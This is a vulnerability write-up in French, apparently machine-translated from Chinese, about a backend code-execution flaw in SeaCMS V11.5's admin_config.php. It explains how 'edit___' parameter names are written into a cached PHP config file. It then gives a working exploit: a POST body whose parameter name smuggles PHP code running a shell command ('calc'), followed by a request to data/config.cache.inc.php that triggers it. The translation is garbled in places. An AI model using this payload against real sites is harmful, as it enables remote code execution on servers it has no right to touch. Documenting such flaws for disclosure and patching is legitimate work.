Ocean CMS (seacms) V11.5 Vulnérabilité d'exécution de code
Annuaire d'articles
1. Présentation de la vulnérabilité
Sea CMS (seacms) V11.5 présente une vulnérabilité d'exécution de code arbitraire en arrière-plan.
2. L'impact de la vulnérabilité
seacms11.5
Troisièmement, le processus de reproduction
Emplacement de la vulnérabilité
1wwvb5\admin_config.php (1wwvb5 est le répertoire d'arrière-plan généré aléatoirement lors de l'installation du système)
page correspondante系统-> 网站设置 -> 模式路径设置
Analyse de vulnérabilité
Le nom de fichier écrit dans le fichier est une valeur fixe (data/config.cache.inc.php), nous nous concentrons donc sur la question de savoir si le contenu du fichier est contrôlable.
Le contenu du fichier est principalement lié au nom du paramètre et à la valeur du paramètre transmis par notre message. Pour $v
certains filtrages, nous pouvons d'abord l'ignorer, et $k
nous ne jugeons que s'il edit___
commence par lui. Et edit___
remplacez-le par un caractère nul à l'arrière.
C'est-à-dire que si nous le transmettons edit___abc=1
, il sera généré $abc='123';
.De cette façon, nous pouvons écrire du code malveillant.
Mais il y a beaucoup de jugements entre les deux que nous devons contourner.
En fait, il doit être inclus dans le nom des paramètres passés par post edit___cfg_df_style、edit___cfg_df_html、edit___cfg_ads_dir、edit___cfg_upload_dir、edit___cfg_backup_dir
, et leurs valeurs sont des traits de soulignement alphanumériques.
exploit
1. Générer des fichiers malveillants
GET:
http://127.0.0.1/1wwvb5/admin_config.php?dopost=save (1wwvb5为系统安装时随机产生的后台目录)
POST:
edit___cfg_df_style=1&edit___cfg_df_html=1&edit___cfg_ads_dir=1&edit___cfg_upload_dir=1&edit___cfg_backup_dir=1&edit___s;`calc`?>=a
2. Accéder au fichier de configuration malveillant généré (en fait, de nombreuses pages contiendront le fichier de configuration généré)
GET
http://127.0.0.1/data/config.cache.inc.php
Déclenché avec succès.
Enfin, nous pouvons regarder le contenu spécifique du fichier de configuration.